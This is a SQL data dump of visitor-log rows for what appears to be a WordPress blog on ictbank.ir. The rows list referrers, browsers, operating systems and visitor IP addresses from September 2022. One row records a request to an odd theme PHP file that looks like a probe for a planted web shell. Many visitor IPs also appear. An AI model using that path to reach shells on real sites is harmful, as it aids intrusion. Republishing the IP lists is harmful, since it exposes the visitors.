(24171,'2022-09-13','http://82.102.9.14/','Chrome','OS X','17.0.963.56','desktop','Macintosh','','137.220.228.89','000',0,3,0),
(24172,'2022-09-13','http://ictbank.ir/blog','Chrome','Linux','105.0.0.0','desktop','Unknown','','45.238.182.172','000',0,2,0),
(24173,'2022-09-13','http://82.102.9.14/blog','Chrome','Windows','60.0.3112.113','desktop','Unknown','','128.14.209.162','000',0,4,0),
(24174,'2022-09-13','http://ictbank.ir/blog','Edge','Windows','91.0.864.54','desktop','Unknown','','65.21.206.45','000',0,1,0),
(24175,'2022-09-13','http://82.102.9.14/','Chrome','OS X','17.0.963.56','desktop','Macintosh','','93.90.72.212','000',0,3,0),
(24176,'2022-09-13','http://ictbank.ir/blog','Internet Explorer','Windows','6.0','desktop','Unknown','','208.80.194.121','000',0,3,0),
(24177,'2022-09-13','http://ictbank.ir/blog','Chrome','Windows','66.0.3359.181','desktop','Unknown','','35.93.14.86','000',0,1,0),
(24178,'2022-09-13','http://ictbank.ir/blog','Chrome','Windows','41.0.2228.0','desktop','Unknown','','64.227.107.188','000',0,2,0),
(24179,'2022-09-13','http://82.102.9.14/blog','Unknown','Android','Unknown','mobile:smart','Mate 30 Pro','','80.87.206.250','000',0,2,0),
(24180,'2022-09-13','http://82.102.9.14/blog','Chrome','Windows','60.0.3112.113','desktop','Unknown','','162.221.192.26','000',0,2,0),
(24181,'2022-09-13','http://ictbank.ir/blog/','Chrome','Windows','104.0.5112.97','desktop','Unknown','','45.63.115.86','000',0,1,0),
(24182,'2022-09-13','http://ictbank.ir/blog/','Chrome','Windows','104.0.5112.97','desktop','Unknown','','95.179.211.0','000',0,1,0),
(24183,'2022-09-13','http://ictbank.ir/blog/','Chrome','Windows','104.0.5112.97','desktop','Unknown','','209.250.227.63','000',0,1,0),
(24184,'2022-09-13','http://ictbank.ir/blog/','Chrome','Windows','104.0.5112.97','desktop','Unknown','','78.141.244.3','000',0,1,0),
(24185,'2022-09-13','http://82.102.9.14/blog','Chrome','Windows','60.0.3112.90','desktop','Unknown','','180.149.125.173','000',0,1,0),
(24186,'2022-09-13','http://82.102.9.14/blog','Chrome','Windows','60.0.3112.113','desktop','Unknown','','185.180.143.7','000',0,2,0),
(24187,'2022-09-13','http://ictbank.ir/blog','Chrome','Windows','74.0.3729.169','desktop','Unknown','','167.114.113.132','000',0,2,0),
(24188,'2022-09-13','http://82.102.9.14/blog','Chrome','Windows','60.0.3112.113','desktop','Unknown','','128.1.248.26','000',0,3,0),
(24189,'2022-09-14','http://ictbank.ir/blog','Internet Explorer','Windows','9.0','desktop','Unknown','','54.183.156.137','000',0,2,0),
(24190,'2022-09-14','http://ictbank.ir/blog','Chrome','Linux','30.0.1599.66','desktop','Unknown','','62.210.215.118','000',0,16,0),
(24191,'2022-09-14','http://82.102.9.14:80/blog','Chrome','Windows','78.0.3904.108','desktop','Unknown','','152.89.196.211','000',0,4,0),
(24192,'2022-09-14','http://82.102.9.14/blog','Chrome','Windows','60.0.3112.113','desktop','Unknown','','128.14.134.134','000',0,2,0),
(24193,'2022-09-14','http://ictbank.ir/blog','Chrome','Windows','11.0.696.68','desktop','Unknown','','208.80.194.122','000',0,2,0),
(24194,'2022-09-14','http://ictbank.ir/blog','Chrome','OS X','14.0.835.202','desktop','Macintosh','','208.80.194.126','000',0,4,0),
(24195,'2022-09-14','https://www.google.com/','Chrome','OS X','105.0.0.0','desktop','Macintosh','','206.116.66.113','000',0,1,0),
(24196,'2022-09-14','http://82.102.9.14:80/blog','Chrome','Windows','88.0.4324.190','desktop','Unknown','','94.102.61.10','000',0,2,0),
(24197,'2022-09-14','http://ictbank.ir/blog','Firefox','Windows','104.0','desktop','Unknown','','130.255.166.98','000',0,1,0),
(24198,'2022-09-14','https://www.bing.com','Chrome','Windows','31.0.1623.0','desktop','Unknown','','104.236.236.23','000',0,3,0),
(24199,'2022-09-14','http://82.102.9.14/blog','Chrome','Windows','60.0.3112.113','desktop','Unknown','','185.180.143.7','000',0,2,0),
(24200,'2022-09-14','http://wikisonnati.com','Unknown','Windows','Unknown','desktop','Unknown','','89.46.223.134','000',0,4,0),
(24201,'2022-09-14','http://ictbank.ir/blog','Internet Explorer','Windows','9.0','desktop','Unknown','','208.80.194.121','000',0,5,0),
(24202,'2022-09-14','http://82.102.9.14/blog','Chrome','Windows','60.0.3112.113','desktop','Unknown','','45.79.204.46','000',0,2,0),
(24203,'2022-09-14','http://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','20.77.35.133','000',0,1,0),
(24204,'2022-09-14','http://ictbank.ir/blog','Chrome','Windows','66.0.3359.181','desktop','Unknown','','35.92.253.214','000',0,1,0),
(24205,'2022-09-14','http://82.102.9.14/blog','Chrome','Windows','60.0.3112.113','desktop','Unknown','','128.14.141.34','000',0,2,0),
(24206,'2022-09-14','http://82.102.9.14/blog','Chrome','Windows','60.0.3112.113','desktop','Unknown','','185.180.143.137','000',0,2,0),
(24207,'2022-09-14','http://82.102.9.14/blog/wp-content/themes/chigue/wp_class_datalib.php?zzz=F5d4JH6m1','Internet Explorer','Windows','6.0','desktop','Unknown','','101.51.140.39','000',0,1,0),
(24208,'2022-09-14','http://ictbank.ir','Chrome','Windows','50.0.2661.75','desktop','Unknown','','167.99.118.196','000',0,1,0),
(24209,'2022-09-14','http://ictbank.ir/blog','Chrome','Windows','83.0.4103.106','desktop','Unknown','','18.206.55.48','000',0,4,0),
(24210,'2022-09-14','http://ictbank.ir/blog','Opera','Windows','80.0.4170.63','desktop','Unknown','','18.206.253.44','000',0,1,0),
(24211,'2022-09-14','http://ictbank.ir/blog','Chrome','Linux','95.0.4638.69','desktop','Unknown','','54.173.255.115','000',0,1,0),
(24212,'2022-09-14','http://82.102.9.14:80/blog','360 Safe Explorer','Windows','Unknown','desktop','Unknown','','183.136.225.35','000',0,2,0),
(24213,'2022-09-14','http://ictbank.ir/blog/','Chrome','Windows','104.0.5112.97','desktop','Unknown','','45.77.62.18','000',0,1,0),
(24214,'2022-09-14','http://ictbank.ir/blog/','Chrome','Windows','104.0.5112.97','desktop','Unknown','','217.69.6.75','000',0,1,0),
(24215,'2022-09-14','http://ictbank.ir/blog/','Chrome','Windows','104.0.5112.97','desktop','Unknown','','78.141.244.3','000',0,1,0),
(24216,'2022-09-14','http://ictbank.ir/blog/','Chrome','Windows','104.0.5112.97','desktop','Unknown','','159.65.21.153','000',0,1,0),
(24217,'2022-09-14','http://82.102.9.14/blog','Chrome','Windows','60.0.3112.113','desktop','Unknown','','128.1.248.26','000',0,2,0),
(24218,'2022-09-14','http://wikisonnati.com','Chrome','Windows','50.0.2661.75','desktop','Unknown','','128.199.179.16','000',0,2,0),
(24219,'2022-09-14','http://ictbank.ir/','Vivaldi','OS X','5.3.2679.68','desktop','Macintosh','','191.96.180.167','000',0,1,0),
(24220,'2022-09-14','http://ictbank.ir/blog','Chrome','Windows','100.0.4896.127','desktop','Unknown','','5.188.62.21','000',0,2,0),
(24221,'2022-09-15','http://82.102.9.14/blog','Chrome','OS X','96.0.4664.110','desktop','Macintosh','','209.141.36.231','000',0,1,0),
(24222,'2022-09-15','http://www.ictbank.ir/blog','Chrome','OS X','96.0.4664.110','desktop','Macintosh','','209.141.51.222','000',0,2,0),
(24223,'2022-09-15','http://ictbank.ir/blog','Chrome','Linux','30.0.1599.66','desktop','Unknown','','62.210.215.118','000',0,16,0),
(24224,'2022-09-15','http://ictbank.ir/blog','Firefox','Windows','67.0','desktop','Unknown','','152.89.196.13','000',0,1,0),
(24225,'2022-09-15','http://wikisonnati.com/blog/','Chrome','Windows','90.0.4430.85','desktop','Unknown','','156.146.63.157','000',0,2,0),
(24226,'2022-09-15','http://ictbank.ir/blog','Safari','OS X','5.1','desktop','Macintosh','','208.80.194.126','000',0,2,0),
(24227,'2022-09-15','http://ictbank.ir/blog','Chrome','Windows','41.0.2228.0','desktop','Unknown','','23.236.147.154','000',0,2,0),
(24228,'2022-09-15','http://ictbank.ir/blog','Chrome','OS X','14.0.835.202','desktop','Macintosh','','208.80.194.121','000',0,5,0),
(24229,'2022-09-15','http://ictbank.ir/blog','Firefox','Windows','7.0.1','desktop','Unknown','','208.80.194.122','000',0,3,0),
(24230,'2022-09-15','http://82.102.9.14/blog','Chrome','Windows','60.0.3112.113','desktop','Unknown','','128.1.248.42','000',0,2,0),
(24231,'2022-09-15','http://ictbank.ir/blog','Chrome','Windows','74.0.3729.169','desktop','Unknown','','147.182.176.179','000',0,2,0),
(24232,'2022-09-15','http://82.102.9.14/blog','Chrome','Windows','79.0.3945.130','desktop','Unknown','','103.149.192.176','000',0,1,0),
(24233,'2022-09-15','http://82.102.9.14/blog/','Chrome','Windows','79.0.3945.130','desktop','Unknown','','103.149.192.167','000',0,1,0),
(24234,'2022-09-15','http://82.102.9.14:80/blog','Chrome','Windows','88.0.4324.190','desktop','Unknown','','94.102.61.10','000',0,2,0),
(24235,'2022-09-15','http://ictbank.ir/blog','Chrome','Windows','66.0.3359.181','desktop','Unknown','','35.90.237.20','000',0,1,0),
(24236,'2022-09-15','http://ictbank.ir/blog','Chrome','Windows','66.0.3359.181','desktop','Unknown','','54.188.47.68','000',0,1,0),
(24237,'2022-09-15','http://82.102.9.14/blog','Firefox','Linux','73.0','desktop','Unknown','','167.99.55.43','000',0,2,0),
(24238,'2022-09-15','http://ictbank.ir/blog/','Chrome','Windows','104.0.5112.97','desktop','Unknown','','209.250.227.63','000',0,1,0),
(24239,'2022-09-15','http://ictbank.ir/blog/','Chrome','Windows','104.0.5112.97','desktop','Unknown','','95.179.211.0','000',0,1,0),
(24240,'2022-09-15','http://ictbank.ir/blog/','Chrome','Windows','104.0.5112.97','desktop','Unknown','','209.97.135.165','000',0,1,0),
(24241,'2022-09-15','http://ictbank.ir/blog/','Chrome','Windows','104.0.5112.97','desktop','Unknown','','209.97.131.196','000',0,1,0),
(24242,'2022-09-15','http://82.102.9.14:80/blog','Chrome','Windows','78.0.3904.108','desktop','Unknown','','152.89.196.211','000',0,1,0),
(24243,'2022-09-15','http://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','202.21.38.53','000',0,2,0),
(24244,'2022-09-15','http://ictbank.ir/blog','Chrome','Windows','74.0.3729.169','desktop','Unknown','','207.180.240.189','000',0,1,0),
(24245,'2022-09-15','http://82.102.9.14/blog','Chrome','Windows','60.0.3112.113','desktop','Unknown','','23.251.102.74','000',0,2,0),
(24246,'2022-09-16','http://82.102.9.14/blog','Unknown','Unknown','Unknown','bot','Unknown','','87.236.176.243','000',0,1,0),
(24247,'2022-09-16','http://ictbank.ir/blog','Firefox','Windows','9.0.1','desktop','Unknown','','208.80.194.121','000',0,7,0),
(24248,'2022-09-16','http://ictbank.ir/blog','Internet Explorer','Windows','9.0','desktop','Unknown','','208.80.194.126','000',0,1,0),
(24249,'2022-09-16','http://ictbank.ir/blog','Chrome','Windows','101.0.4951.67','desktop','Unknown','','5.188.62.174','000',0,2,0),
(24250,'2022-09-16','http://ictbank.ir/blog','Chrome','Windows','79.0','desktop','Unknown','','20.168.43.164','000',0,2,0),
(24251,'2022-09-16','http://ictbank.ir:80','Internet Explorer','Windows','6.0','desktop','Unknown','','104.233.141.90','000',0,6,0),
(24252,'2022-09-16','http://ictbank.ir','Internet Explorer','Windows','8.0','desktop','Unknown','','164.155.77.108','000',0,2,0),
(24253,'2022-09-16','http://82.102.9.14/blog','Chrome','Windows','60.0.3112.90','desktop','Unknown','','180.149.125.165','000',0,1,0),
(24254,'2022-09-16','http://ictbank.ir/blog','Internet Explorer','Windows','9.0','desktop','Unknown','','208.80.194.122','000',0,1,0),
(24255,'2022-09-16','http://82.102.9.14/blog','Chrome','Linux','86.0.4','desktop','Unknown','','118.123.105.87','000',0,2,0),
(24256,'2022-09-16','http://ictbank.ir/blog','Firefox','Windows','55.0','desktop','Unknown','','45.61.186.85','000',0,2,0),
(24257,'2022-09-16','http://ictbank.ir/blog','Firefox','Windows','8.0','desktop','Unknown','','178.79.160.204','000',0,2,0),
(24258,'2022-09-16','http://ictbank.ir/blog','Chrome','Windows','85.0.4183.121','desktop','Unknown','','103.137.147.99','000',0,16,0),
(24259,'2022-09-16','http://www.ictbank.ir/blog','Chrome','OS X','96.0.4664.110','desktop','Macintosh','','209.141.49.169','000',0,1,0),
(24260,'2022-09-16','http://82.102.9.14/blog','Chrome','OS X','96.0.4664.110','desktop','Macintosh','','209.141.36.112','000',0,1,0),
(24261,'2022-09-16','http://ictbank.ir/blog','Chrome','OS X','96.0.4664.110','desktop','Macintosh','','104.28.210.57','000',0,1,0),
(24262,'2022-09-16','http://ictbank.ir/blog','Chrome','Windows','66.0.3359.181','desktop','Unknown','','35.167.158.118','000',0,1,0),
(24263,'2022-09-16','http://ictbank.ir/blog','Chrome','Windows','66.0.3359.181','desktop','Unknown','','34.211.25.9','000',0,1,0),
(24264,'2022-09-16','http://ictbank.ir/blog','Chrome','Linux','61.0.3163.79','desktop','Unknown','','64.124.8.34','000',0,3,0),
(24265,'2022-09-16','http://82.102.9.14/blog','Chrome','Windows','60.0.3112.113','desktop','Unknown','','128.14.209.162','000',0,2,0),
(24266,'2022-09-16','http://ictbank.ir/blog/','Chrome','Windows','104.0.5112.97','desktop','Unknown','','209.97.135.165','000',0,2,0),
(24267,'2022-09-16','http://ictbank.ir/blog/','Chrome','Windows','104.0.5112.97','desktop','Unknown','','45.77.62.18','000',0,1,0),
(24268,'2022-09-16','http://ictbank.ir/blog/','Chrome','Windows','104.0.5112.97','desktop','Unknown','','209.250.227.63','000',0,1,0),
(24269,'2022-09-16','http://ictbank.ir/blog','Opera','Windows','46.0.2597.57','desktop','Unknown','','198.46.235.68','000',0,2,0),
(24270,'2022-09-16','http://ictbank.ir/blog','Chrome','Windows','83.0.4103.106','desktop','Unknown','','52.207.252.233','000',0,4,0),
(24271,'2022-09-16','http://ictbank.ir/blog','Chrome','Windows','100.0.4758.11','desktop','Unknown','','5.188.62.140','000',0,2,0),
(24272,'2022-09-17','http://ictbank.ir/blog','Chrome','Linux','12.0.742.100','desktop','Unknown','','208.80.194.121','000',0,5,0),
(24273,'2022-09-17','http://ictbank.ir/blog','Chrome','OS X','11.0.696.68','desktop','Macintosh','','208.80.194.122','000',0,4,0),
(24274,'2022-09-17','http://ictbank.ir/blog','360 Safe Explorer','Windows','Unknown','desktop','Unknown','','149.102.137.9','000',0,2,0),
(24275,'2022-09-17','http://82.102.9.14:80/blog','Chrome','Windows','88.0.4324.190','desktop','Unknown','','94.102.61.10','000',0,3,0),
(24276,'2022-09-17','http://ictbank.ir/blog','Chrome','Windows','71.0.3578.98','desktop','Unknown','','93.159.230.83','000',0,4,0),
(24277,'2022-09-17','http://ictbank.ir/blog','Chrome','Windows','79.0','desktop','Unknown','','134.209.104.59','000',0,2,0),
(24278,'2022-09-17','http://ictbank.ir/blog','Chrome','Windows','71.0.3578.98','desktop','Unknown','','77.74.177.119','000',0,3,0),
(24279,'2022-09-17','http://ictbank.ir/blog','Chrome','Windows','10.0.648.151','desktop','Unknown','','208.80.194.126','000',0,3,0),
(24280,'2022-09-17','http://ictbank.ir/blog','Chrome','Linux','30.0.1599.66','desktop','Unknown','','62.210.215.118','000',0,2,0),
(24281,'2022-09-17','http://ictbank.ir/blog','Chrome','Windows','99.0.4844.84','desktop','Unknown','','5.188.62.21','000',0,1,0),
(24282,'2022-09-17','http://ictbank.ir/blog','Chrome','Windows','71.0.3578.98','desktop','Unknown','','93.159.230.88','000',0,1,0),
(24283,'2022-09-17','http://ictbank.ir/blog','Chrome','Windows','71.0.3578.98','desktop','Unknown','','93.159.230.89','000',0,2,0),
(24284,'2022-09-17','http://82.102.9.14:80/blog','Chrome','Windows','78.0.3904.108','desktop','Unknown','','152.89.196.211','000',0,1,0),
(24285,'2022-09-17','http://ictbank.ir/blog','Chrome','Windows','66.0.3359.181','desktop','Unknown','','35.93.75.69','000',0,1,0),
(24286,'2022-09-17','http://ictbank.ir/blog','Chrome','Windows','66.0.3359.181','desktop','Unknown','','18.236.206.124','000',0,1,0),
(24287,'2022-09-17','http://ictbank.ir/blog','Chrome','Windows','5.0.375.99','desktop','Unknown','','185.81.1.101','000',0,1,0),
(24288,'2022-09-17','http://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','103.177.224.103','000',0,2,0),
(24289,'2022-09-17','http://ictbank.ir/blog','Chrome','Windows','63.0.3239.132','desktop','Unknown','','185.119.81.107','000',0,2,0),
(24290,'2022-09-17','http://ictbank.ir/blog/','Chrome','Windows','104.0.5112.97','desktop','Unknown','','108.61.123.152','000',0,1,0),
(24291,'2022-09-17','http://ictbank.ir/blog/','Chrome','Windows','104.0.5112.97','desktop','Unknown','','209.97.135.165','000',0,1,0),
(24292,'2022-09-17','http://ictbank.ir/blog/','Chrome','Windows','104.0.5112.97','desktop','Unknown','','134.209.20.42','000',0,1,0),
(24293,'2022-09-17','http://ictbank.ir/blog/','Chrome','Windows','104.0.5112.97','desktop','Unknown','','209.97.131.196','000',0,1,0),
(24294,'2022-09-17','http://82.102.9.14/blog','Chrome','OS X','96.0.4664.110','desktop','Macintosh','','205.185.116.25','000',0,1,0),
(24295,'2022-09-17','http://www.ictbank.ir/blog','Chrome','OS X','96.0.4664.110','desktop','Macintosh','','209.141.36.231','000',0,1,0),
(24296,'2022-09-17','http://ictbank.ir/blog','Chrome','OS X','96.0.4664.110','desktop','Macintosh','','205.185.121.69','000',0,1,0),
(24297,'2022-09-17','http://82.102.9.14:80/blog','360 Safe Explorer','Windows','Unknown','desktop','Unknown','','183.136.225.35','000',0,2,0),
(24298,'2022-09-18','http://ictbank.ir/blog','Firefox','Windows','3.6.18','desktop','Unknown','','208.80.194.121','000',0,6,0),
(24299,'2022-09-18','http://ictbank.ir/blog','Edge','Windows','91.0.864.54','desktop','Unknown','','65.21.206.43','000',0,1,0),
(24300,'2022-09-18','http://ictbank.ir/blog','Internet Explorer','Windows','7.0','desktop','Unknown','','208.80.194.126','000',0,3,0),
(24301,'2022-09-18','http://ictbank.ir/blog','Chrome','Windows','75.0.3770.100','desktop','Unknown','','185.119.81.107','000',0,2,0),
(24302,'2022-09-18','http://82.102.9.14:80/blog','Chrome','Windows','78.0.3904.108','desktop','Unknown','','152.89.196.211','000',0,2,0),
(24303,'2022-09-18','http://ictbank.ir/blog','Chrome','Windows','66.0.3359.181','desktop','Unknown','','54.244.160.249','000',0,1,0),
(24304,'2022-09-18','http://82.102.9.14/blog','Unknown','Unknown','Unknown','bot','Unknown','','87.236.176.240','000',0,1,0),
(24305,'2022-09-18','http://ictbank.ir/blog/','Chrome','Windows','104.0.5112.97','desktop','Unknown','','45.77.62.18','000',0,1,0),
(24306,'2022-09-18','http://ictbank.ir/blog/','Chrome','Windows','104.0.5112.97','desktop','Unknown','','209.250.227.63','000',0,1,0),
(24307,'2022-09-18','http://ictbank.ir/blog/','Chrome','Windows','104.0.5112.97','desktop','Unknown','','209.97.135.165','000',0,1,0),
(24308,'2022-09-18','http://ictbank.ir/blog/','Chrome','Windows','104.0.5112.97','desktop','Unknown','','159.65.21.153','000',0,1,0),
(24309,'2022-09-19','http://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','103.177.225.15','000',0,2,0),
(24310,'2022-09-19','http://82.102.9.14:80/blog','Chrome','Windows','88.0.4324.190','desktop','Unknown','','94.102.61.10','000',0,2,0),
(24311,'2022-09-19','http://ictbank.ir/blog','Internet Explorer','Windows','7.0','desktop','Unknown','','208.80.194.122','000',0,4,0),
(24312,'2022-09-19','http://ictbank.ir/blog','Chrome','Linux','30.0.1599.66','desktop','Unknown','','62.210.215.118','000',0,2,0),
(24313,'2022-09-19','http://ictbank.ir/blog','Firefox','Ubuntu','3.6.11','desktop','Unknown','','208.80.194.126','000',0,3,0),
(24314,'2022-09-19','http://ictbank.ir/blog','Firefox','Windows','9.0.1','desktop','Unknown','','209.141.43.103','000',0,2,0),
(24315,'2022-09-19','http://ictbank.ir/blog','Chrome','Windows','41.0.2228.0','desktop','Unknown','','51.254.59.113','000',0,1,0),
(24316,'2022-09-19','http://wikisonnati.com/blog/','Chrome','Windows','90.0.4430.85','desktop','Unknown','','46.3.197.7','000',0,2,0),
(24317,'2022-09-19','http://ictbank.ir/blog','Chrome','Windows','98.0.4758.102','desktop','Unknown','','69.172.75.39','000',0,7,0),
(24318,'2022-09-19','http://82.102.9.14:80/blog','360 Safe Explorer','Windows','Unknown','desktop','Unknown','','183.136.225.35','000',0,4,0),
(24319,'2022-09-19','http://82.102.9.14:80/blog','Chrome','Windows','78.0.3904.108','desktop','Unknown','','152.89.196.211','000',0,2,0),
(24320,'2022-09-19','http://ictbank.ir/blog','Chrome','Linux','5.0.375.53','desktop','Unknown','','208.80.194.121','000',0,2,0),
(24321,'2022-09-19','http://ictbank.ir/blog','Chrome','Windows','66.0.3359.181','desktop','Unknown','','54.184.30.203','000',0,1,0),
(24322,'2022-09-19','http://82.102.9.14/blog','Chrome','Windows','60.0.3112.113','desktop','Unknown','','185.180.143.72','000',0,2,0),
(24323,'2022-09-19','http://ictbank.ir/blog','Chrome','Windows','91.0.4472.77','desktop','Unknown','','185.119.81.107','000',0,4,0),
(24324,'2022-09-19','http://ictbank.ir/blog/','Chrome','Windows','104.0.5112.97','desktop','Unknown','','45.63.115.86','000',0,1,0),
(24325,'2022-09-19','http://ictbank.ir/blog/','Chrome','Windows','104.0.5112.97','desktop','Unknown','','78.141.244.3','000',0,1,0),
(24326,'2022-09-19','http://ictbank.ir/blog/','Chrome','Windows','104.0.5112.97','desktop','Unknown','','134.209.20.42','000',0,1,0),
(24327,'2022-09-19','http://ictbank.ir/blog/','Chrome','Windows','104.0.5112.97','desktop','Unknown','','209.97.131.196','000',0,1,0),
(24328,'2022-09-19','https://duckduckgo.com/','Firefox','Windows','103.0','desktop','Unknown','','96.81.176.209','000',0,1,0),
(24329,'2022-09-19','http://ictbank.ir/blog/index.php/category/web-security/apache/','Edge','Windows','90.0.818.42','desktop','Unknown','','37.139.53.10','000',0,7,0),
(24330,'2022-09-19','http://ictbank.ir','Chrome','Windows','50.0.2661.75','desktop','Unknown','','162.213.252.92','000',0,1,0),
(24331,'2022-09-20','http://ictbank.ir/blog','Chrome','Windows','85.0.4183.102','desktop','Unknown','','20.219.60.192','000',0,1,0),
(24332,'2022-09-20','http://82.102.9.14:80/blog','360 Safe Explorer','Windows','Unknown','desktop','Unknown','','183.136.225.44','000',0,1,0),
(24333,'2022-09-20','http://ictbank.ir/blog','Chrome','Windows','11.0.696.68','desktop','Unknown','','208.80.194.121','000',0,4,0),
(24334,'2022-09-20','http://ictbank.ir/blog','Chrome','Windows','57.0.2987.133','desktop','Unknown','','185.119.81.107','000',0,4,0),
(24335,'2022-09-20','http://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','34.152.32.37','000',0,1,0),
(24336,'2022-09-20','http://wikisonnati.ir/blog','Unknown','Windows','Unknown','desktop','Unknown','','192.36.71.133','000',0,2,0),
(24337,'2022-09-20','http://82.102.9.14/blog','Chrome','Windows','60.0.3112.113','desktop','Unknown','','185.180.143.72','000',0,2,0),
(24338,'2022-09-20','http://ictbank.ir/blog','Chrome','Windows','52.0.3063.79','desktop','Unknown','','107.22.42.108','000',0,2,0),
(24339,'2022-09-20','http://ictbank.ir/blog','Unknown','Windows','Unknown','desktop','Unknown','','84.17.58.94','000',0,1,0),
(24340,'2022-09-20','http://ictbank.ir/blog','Chrome','Windows','70.0.3538.77','desktop','Unknown','','143.244.129.173','000',0,2,0),
(24341,'2022-09-20','http://ictbank.ir/blog','Chrome','Windows','83.0.4103.61','desktop','Unknown','','173.255.240.18','000',0,4,0),
(24342,'2022-09-20','http://ictbank.ir/blog','Chrome','Windows','66.0.3359.181','desktop','Unknown','','54.189.185.65','000',0,1,0),
(24343,'2022-09-20','http://ictbank.ir/blog','Firefox','Windows','3.6.8','desktop','Unknown','','208.80.194.126','000',0,3,0),
(24344,'2022-09-20','http://82.102.9.14:80/blog','Chrome','Windows','78.0.3904.108','desktop','Unknown','','152.89.196.211','000',0,7,0),
(24345,'2022-09-20','http://ictbank.ir/blog','Chrome','Windows','74.0.3729.157','desktop','Unknown','','51.254.199.11','000',0,2,0),
(24346,'2022-09-20','http://ictbank.ir/blog','Chrome','Linux','30.0.1599.66','desktop','Unknown','','62.210.215.118','000',0,2,0),
(24347,'2022-09-20','http://ictbank.ir/blog','Firefox','Windows','3.0.3','desktop','Unknown','','209.58.147.122','000',0,3,0),
(24348,'2022-09-20','http://82.102.9.14/','Chrome','OS X','17.0.963.56','desktop','Macintosh','','23.224.189.36','000',0,3,0),
(24349,'2022-09-20','http://82.102.9.14/blog','Chrome','Windows','60.0.3112.90','desktop','Unknown','','180.149.125.168','000',0,1,0),
(24350,'2022-09-20','http://ictbank.ir/blog/','Chrome','Windows','104.0.5112.97','desktop','Unknown','','78.141.199.102','000',0,2,0),
(24351,'2022-09-20','http://ictbank.ir/blog/','Chrome','Windows','104.0.5112.97','desktop','Unknown','','209.97.135.165','000',0,2,0),
(24352,'2022-09-20','http://ictbank.ir/blog/index.php/2020/11/03/fedora-33-problem-with-broadcom-wifi-device/','Chrome','Windows','90.0.4430.85','desktop','Unknown','','37.139.53.40','000',0,8,0),
(24353,'2022-09-20','http://82.102.9.14:80/blog','Chrome','Windows','88.0.4324.190','desktop','Unknown','','94.102.61.10','000',0,2,0),
(24354,'2022-09-21','http://ictbank.ir/blog','Chrome','Linux','58.0.3029.110','desktop','Unknown','','35.153.73.220','000',0,1,0),
(24355,'2022-09-21','http://ictbank.ir/blog','Chrome','Windows','41.0.2228.0','desktop','Unknown','','20.230.55.112','000',0,2,0),
(24356,'2022-09-21','http://ictbank.ir/blog','Chrome','Windows','37.0.2049.0','desktop','Unknown','','20.10.144.47','000',0,6,0),
(24357,'2022-09-21','http://ictbank.ir/blog','Chrome','OS X','103.0.0.0','desktop','Macintosh','','23.227.72.217','000',0,1,0),
(24358,'2022-09-21','http://82.102.9.14/blog','Chrome','Windows','60.0.3112.113','desktop','Unknown','','193.118.53.210','000',0,4,0),
(24359,'2022-09-21','http://ictbank.ir/blog','Chrome','Windows','11.0.696.68','desktop','Unknown','','208.80.194.126','000',0,2,0),
(24360,'2022-09-21','http://ictbank.ir/blog','Chrome','Windows','12.0.742.91','desktop','Unknown','','208.80.194.122','000',0,5,0),
(24361,'2022-09-21','http://ictbank.ir/blog','Chrome','Linux','105.0.0.0','desktop','Unknown','','199.244.88.223','000',0,1,0),
(24362,'2022-09-21','http://ictbank.ir/blog','Firefox','Windows','65.0','desktop','Unknown','','184.94.240.88','000',0,1,0),
(24363,'2022-09-21','http://ictbank.ir/blog','Edge','Windows','91.0.864.54','desktop','Unknown','','81.169.136.222','000',0,1,0),
(24364,'2022-09-21','http://ictbank.ir/blog','Chrome','Windows','93.0.4577.63','desktop','Unknown','','185.119.81.108','000',0,2,0),
(24365,'2022-09-21','http://82.102.9.14/blog','Chrome','Windows','60.0.3112.113','desktop','Unknown','','139.162.215.70','000',0,2,0),
(24366,'2022-09-21','http://ictbank.ir/blog','Chrome','Windows','66.0.3359.181','desktop','Unknown','','34.219.168.199','000',0,1,0),
(24367,'2022-09-21','http://ictbank.ir/blog','Firefox','Windows','29.0','desktop','Unknown','','20.242.50.124','000',0,2,0),
(24368,'2022-09-21','http://82.102.9.14/blog','Chrome','OS X','96.0.4664.110','desktop','Macintosh','','209.141.36.231','000',0,1,0),
(24369,'2022-09-21','http://ictbank.ir/blog','Chrome','OS X','96.0.4664.110','desktop','Macintosh','','205.185.116.89','000',0,1,0),
(24370,'2022-09-21','http://www.ictbank.ir/blog','Chrome','OS X','96.0.4664.110','desktop','Macintosh','','209.141.55.120','000',0,1,0),
(24371,'2022-09-21','http://mail.design-arena.ir/blog','Chrome','OS X','96.0.4664.110','desktop','Macintosh','','209.141.35.128','000',0,1,0),
(24372,'2022-09-21','http://ictbank.ir/blog','Chrome','Windows','12.0.742.91','desktop','Unknown','','208.80.194.121','000',0,1,0),
(24373,'2022-09-21','http://ictbank.ir/blog/','Chrome','Windows','104.0.5112.97','desktop','Unknown','','134.209.20.42','000',0,1,0),
(24374,'2022-09-21','http://ictbank.ir/blog/','Chrome','Windows','104.0.5112.97','desktop','Unknown','','192.81.222.35','000',0,1,0),
(24375,'2022-09-21','http://ictbank.ir/blog/','Chrome','Windows','104.0.5112.97','desktop','Unknown','','209.97.131.196','000',0,1,0),
(24376,'2022-09-21','http://ictbank.ir/blog/','Chrome','Windows','104.0.5112.97','desktop','Unknown','','159.65.21.153','000',0,1,0),
(24377,'2022-09-21','http://ictbank.ir/blog','Chrome','Windows','70.0.3538.77','desktop','Unknown','','185.119.81.100','000',0,4,0),
(24378,'2022-09-22','http://wikisonnati.com/blog','Chrome','Windows','74.0.3729.169','desktop','Unknown','','164.68.106.210','000',0,2,0),
(24379,'2022-09-22','http://ictbank.ir/blog','Chrome','Windows','83.0.4103.106','desktop','Unknown','','52.207.252.233','000',0,8,0),
(24380,'2022-09-22','http://ictbank.ir/blog/index.php/category/os/linxu/','Chrome','Windows','90.0.4430.85','desktop','Unknown','','37.139.53.40','000',0,7,0),
(24381,'2022-09-22','http://82.102.9.14/blog','Unknown','Unknown','Unknown','bot','Unknown','','87.236.176.229','000',0,1,0),
(24382,'2022-09-22','http://ictbank.ir/blog','Firefox','Windows','3.6.8','desktop','Unknown','','208.80.194.122','000',0,2,0),
(24383,'2022-09-22','http://ictbank.ir/blog','Internet Explorer','Windows','9.0','desktop','Unknown','','208.80.194.121','000',0,7,0),
(24384,'2022-09-22','http://ictbank.ir/blog','Chrome','Linux','30.0.1599.66','desktop','Unknown','','62.210.215.118','000',0,14,0),
